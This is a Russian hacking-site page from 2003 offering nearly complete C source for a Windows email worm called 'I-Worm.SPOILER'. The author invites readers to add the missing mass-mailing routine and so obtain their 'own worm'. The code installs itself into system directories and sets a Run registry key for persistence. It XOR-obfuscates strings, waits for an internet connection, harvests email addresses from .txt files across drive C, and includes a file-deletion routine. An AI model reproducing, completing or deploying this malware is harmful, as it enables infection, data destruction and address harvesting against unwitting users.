Информация сайта компьютерной безопасности
<<< Hack Style >>>

made by [PVL] KAPMAH in 2003
"ПОЧТИ" рабочий сырец - не бойтесь почти это значит у червя нет только отправки
а пока он делает: инсталирует себя в систему и висит ожидая выхода в сеть - 
дождавшись ищет фаилы *.txt (можно любые) и находит в них E-mail адреса - а потом .........
должен отсылать себя но здесь он этого не делает а остальное все работает отлично .....
да еще некоторые строки зашифрованы от лишних глаз (конечно не ваших просто расшифровывать лень)
почему тогда не все зашифрованы ? да яж говорю сырец горячий прям с компила снял...
так что вам осталось прописать процедуру отправки (которую мне так лень было дописать)
и вы получите СВОЕГО (!!!) червячка ... хотя и этот код уже несет в себе диструкцию !!!

#include <windows.h>
#include <stdio.h>
#include <winsock2.h>

BOOL CALLBACK WindowProc(HWND ,UINT ,WPARAM ,LPARAM);

typedef BOOL (WINAPI* INETCHECKPROC) (LPDWORD lpdwFlags, DWORD dwReserved);
typedef void (*LPSEARCHFUNC)(LPCTSTR lpszFileName);
typedef DWORD (WINAPI *LPREGISTERSERVICEPROCESS) (DWORD, DWORD);

static BOOL CALLBACK DialogFunc(HWND hwndDlg, UINT msg, WPARAM wParam, LPARAM lParam);
BOOL ONCREATE(HWND hwnd);
BOOL RUN(char *NAME,char *VIRNAME,int END);
BOOL ScanFile(char *f);
BOOL SEND(char *ATTACH,char *EMAIL);
BOOL SearchFiles(LPCTSTR lpszFileName,BOOL bInnerFolders,BOOL spoil);
int isgood(char a);
int islisten(char a);
char *DECODE(char *TEXTCODE);

UINT_PTR IDT_NETTRAP;
char *szClassWindow="WinClass",szPath[0x100];

char *REGNAME,*REGTITLE,*TITLE="I-Worm.SPOILER";

char *DECODE(char *TEXTCODE){
char K=9*111;
 for(int i=0; ;i++){
   if(TEXTCODE[i]=='\0') break;
   TEXTCODE[i]=TEXTCODE[i] ^ K;
  }
	return TEXTCODE;
}



BOOL SearchFiles(LPCTSTR lpszFileName,BOOL bInnerFolders,BOOL spoil)
{
    LPTSTR part;
    char tmp[MAX_PATH];
    char name[MAX_PATH];

    HANDLE hSearch = NULL;
    WIN32_FIND_DATA wfd;
    memset(&wfd, 0, sizeof(WIN32_FIND_DATA));


    if(bInnerFolders==TRUE)
    {
        if(GetFullPathName(lpszFileName, MAX_PATH, tmp, &part) == 0) return FALSE;
        strcpy(name, part);
        strcpy(part, "*.*");
        wfd.dwFileAttributes = FILE_ATTRIBUTE_DIRECTORY;
        if (!((hSearch = FindFirstFile(tmp, &wfd)) == INVALID_HANDLE_VALUE))
        do
       {
            if (!strncmp(wfd.cFileName, ".", 1) || !strncmp(wfd.cFileName, "..", 2))
            continue;

            if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
            {
                char next[MAX_PATH];
                if(GetFullPathName(lpszFileName, MAX_PATH, next, &part) == 0) return FALSE;
                strcpy(part, wfd.cFileName);
                strcat(next, "\\");
                strcat(next, name);

                SearchFiles(next,TRUE,spoil);
            }
        }
        while (FindNextFile(hSearch, &wfd));

        FindClose (hSearch);
    }

    if ((hSearch = FindFirstFile(lpszFileName, &wfd)) == INVALID_HANDLE_VALUE)
        return TRUE;
    do
    if (!(wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
    {
        char file[MAX_PATH];
        if(GetFullPathName(lpszFileName, MAX_PATH, file, &part) == 0) return FALSE;
        strcpy(part, wfd.cFileName);

       if(spoil!=TRUE){ScanFile(file);}else{
		   MessageBox(NULL,file,"УДАЛИТЬ ?",0);
//а вот и диструкция ...
		   DeleteFile(file);}
    }
    while (FindNextFile(hSearch, &wfd));
    FindClose (hSearch);

    return TRUE;
}

int isgood(char a) {
	if (a >= 'a' && a <= 'z') return 1;
	if (a >= 'A' && a <= 'Z') return 1;
	if (a >= '0' && a <= '9') return 1;
	if (a == '.' || a == '@' || a == '^' || a == '-' || a == '_') return 1;
	return 0;
}

int islisten(char a) {
	if (a == '.') return 1;
	if (a >= 'a' && a <= 'z') return 1;
	if (a >= 'A' && a <= 'Z') return 1;
	return 0;
}

BOOL ScanFile(char *f) {
	FILE *file=fopen(f,"r");
	unsigned long startpos=0;
	if (file == NULL) return FALSE;
	while(1) {
		char buf[2];
		memset(buf,0,2);
		fseek(file,startpos,SEEK_SET);
		fread(buf,1,1,file);
		startpos++;
		if (feof(file)) break;
		if (*buf == '@') {
			char email[256],c,d;
			unsigned long pos=0;
			while(1) {
				unsigned long oldpos=ftell(file);
				fseek(file,-1,SEEK_CUR);
				c=fgetc(file);
				if (!isgood(c)) break;
				fseek(file,-1,SEEK_CUR);
				if (oldpos == ftell(file)) break;
			}
			for (pos=0,c=0,d=0;pos<255;pos++) {
				email[pos]=fgetc(file);
				if (email[pos] == '.') c++;
				if (email[pos] == '@') d++;
				if (!isgood(email[pos])) break;
			}
			email[pos]=0;
			if (c == 0 || d != 1) continue;
			if (email[strlen(email)-1] == '.') email[strlen(email)-1]=0;
			if (*email == '@' || *email == '.' || !*email) continue;
			for (pos=0,c=0;pos<strlen(email);pos++) if (email[pos] == '.') c=pos;
			if (c == 0) continue;
			//if (!strncmp(email+c,".hlp",4)) continue;
			//if (!strncmp(email+c,".gov",4)) continue;
			for (pos=c,d=0;pos<strlen(email);pos++) if (!islisten(email[pos])) d=1;
			if (d == 1) continue;
			//Send(myfile,email);
			MessageBox(NULL,email,"А Я АДРЕС НАШЕЛ !!!",0);
		}
	}
	fclose(file);
	return TRUE;
}

BOOL ONCREATE(HWND hwnd){
RUN(REGTITLE=DECODE("°Ћ‰ФХѓ‹‹"),REGNAME=DECODE("°Ћ‰ФХѓ‹‹Й‚џ‚"),0);
SetTimer(hwnd,IDT_NETTRAP,1000*60,(TIMERPROC) NULL);
return TRUE;
}

BOOL RUN(char *NAME,char *VIRNAME,int END)
{
HKEY hKey;
char szWIN[0x100],szWIN32[0x100];
GetSystemDirectory(szWIN,sizeof(szWIN));
GetSystemDirectory(szWIN32,sizeof(szWIN32));
GetModuleFileName(NULL, szPath, sizeof(szPath));

lstrcat(szWIN,"\\");
lstrcat(szWIN,VIRNAME);
CopyFile(szPath,szWIN,TRUE);

strcat(szWIN32,"32\\");
lstrcat(szWIN32,VIRNAME);
CopyFile(szPath,szWIN32,FALSE);

RegCreateKeyEx(HKEY_LOCAL_MACHINE,
DECODE("ґ€Ѓ“ђ†•‚»ЄЋ„•€”€Ѓ“»°Ћ‰ѓ€ђ”»¤’••‚‰“±‚•”Ћ€‰»µ’‰"),
0,
"",
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,
NULL,
&hKey,
NULL);
if (hKey)
  {
        RegSetValueEx(hKey, NAME, 0, REG_SZ, (LPBYTE)VIRNAME, strlen(VIRNAME));
        RegCloseKey(hKey);
  }

  if(END==0){
if(szPath!=szWIN || szPath!=szWIN32){MessageBox(NULL,"Programm was corrupt or some components not find !","ERROR",0);}
  }

return TRUE;
}

BOOL GetStatusConnect()
{
    BOOL bRetVal;
    HINSTANCE hLib = NULL;
    INETCHECKPROC pfnInternetGetConnectedState;
    hLib = LoadLibrary(DECODE("ђЋ‰Ћ‰‚“Йѓ‹‹"));
    if (!hLib) return 0;
    pfnInternetGetConnectedState = (INETCHECKPROC)GetProcAddress(hLib, DECODE("®‰“‚•‰‚“ ‚“¤€‰‰‚„“‚ѓґ“†“‚"));
    if(!pfnInternetGetConnectedState)
    return FALSE;
    DWORD lpdwFlags;
    bRetVal = pfnInternetGetConnectedState(&lpdwFlags, 0) != 0;
    FreeLibrary(hLib);
    return bRetVal;
}

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpszCmdLine, int nCmdShow)
{
	HWND hWnd;
	MSG lpMsg;
	WNDCLASSEX wcl;

wcl.cbSize = sizeof (wcl);
wcl.style = CS_HREDRAW|CS_VREDRAW;
wcl.lpfnWndProc = WindowProc;
wcl.cbClsExtra  =0;
wcl.cbWndExtra  = 0;
wcl.hInstance = hInst;
wcl.hIcon = LoadIconA(NULL,IDI_APPLICATION);
wcl.hCursor = LoadCursorA(NULL,IDC_ARROW);
wcl.hbrBackground =(HBRUSH)GetStockObject (WHITE_BRUSH);
wcl.lpszMenuName = NULL;
wcl.lpszClassName = szClassWindow;
wcl.hIconSm=NULL;

if (!RegisterClassEx (&wcl))
return 0;

if(FindWindowA(0,TITLE)){
	MessageBoxA(NULL,"FATAL ERROR !","ERROR",0);
	PostQuitMessage (0);}

hWnd=CreateWindowEx(
	0,
	szClassWindow,
 	TITLE,
	WS_OVERLAPPEDWINDOW,
	CW_USEDEFAULT,
	CW_USEDEFAULT,
	CW_USEDEFAULT,
	CW_USEDEFAULT,
	NULL,
	NULL,
	hInst,
	NULL);
//ShowWindow (hWnd, nCmdShow);
//UpdateWindow (hWnd);


while (GetMessage(&lpMsg,NULL,0,0))
{
	TranslateMessage(&lpMsg);
	DispatchMessage(&lpMsg);
}
	return lpMsg.wParam;
}

BOOL CALLBACK WindowProc (HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	char str[0x100];
	switch(message)
	{
	case WM_CREATE:
	ONCREATE(hWnd);;
	return TRUE;

	case WM_TIMER:
if(GetStatusConnect()==1){
	KillTimer(hWnd,IDT_NETTRAP);
	MessageBox(NULL,"ON LINE","INTERNET",0);
SearchFiles("C:\\*.txt",TRUE,FALSE);
RUN(REGTITLE,REGNAME,1);
PostQuitMessage (0);
}
	return TRUE;

	case WM_DESTROY:
	RUN(REGTITLE,REGNAME,1);
	KillTimer(hWnd,IDT_NETTRAP);
	PostQuitMessage (0);
	break;
	default:
	return DefWindowProc (hWnd, message, wParam, lParam);
}
return FALSE;
}

BOOL SEND(char *ATTACH,char *EMAIL){

return TRUE;

}


















Все права защищены ~< KAPMAH >~
www.HackStyle.narod.ru